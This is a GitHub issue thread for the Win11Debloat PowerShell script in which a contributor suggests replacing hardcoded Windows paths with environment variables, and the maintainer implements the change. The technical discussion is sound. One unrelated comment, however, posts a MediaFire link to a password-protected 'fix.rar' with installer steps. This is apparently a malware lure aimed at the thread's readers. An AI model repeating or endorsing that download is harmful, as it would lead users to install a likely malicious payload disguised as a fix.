### ISSUE TITLE
Use environment variables for the location of directories and files

### ISSUE THREAD

**Issue by DLBerger** [Raphire/Win11Debloat#118]
I've noticed several places where you assume the location of directories and/or files.
This is a classic problem for many Windows programs.
The environment will tell you where these locations are.

Here's an egregious example"

$startMenuBinFile = "C:\Users\$([Environment]::UserName)\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\LocalState\start2.bin"

This example has 2 problems:
  1) It assumes that the Users folder is on the C: drive, which is not always true, especially for people who would be using this script
  2) It assumes the name of the Local Application Data folder

The environment has the variable LOCALAPPDATA, so this line could be written:

$startMenuBinFile = "$env:LOCALAPPDATA\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\LocalState\start2.bin"

I would also suggest that all of these environment-related strings should be defined as $global variables so there is a single definition of them in your code, e.g.,

$global:AppData = $env:APPDATA
$global:LocalAppData = $env:LOCALAPPDATA
$global:UserName = $env:USERNAME
$global:UserProfile = $env:USERPROFILE
$global:DefaultProfile = $global:UserProfile.Replace($global:UserName, 'Default')
$global:DefaultLocalAppData = $global:LocalAppData.Replace($global:UserName, 'Default')
$global:DefaultNTUSERDAT = "$global:DefaultProfile\NTUSER.DAT"

Now you can use these variables throughout the script without having to know the details of how they are defined.

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Raphire** [comment]
Heya,

Thanks for pointing this out. I'll see if I can change the hardcoded paths soon.

**Comment by DLBerger** [comment]
Thank you for writing this useful tool.

**Comment by Raphire** [comment]
Implemented as of 171c69a

I opted not to use global variables for defining these paths as I find it better for readability purposes.
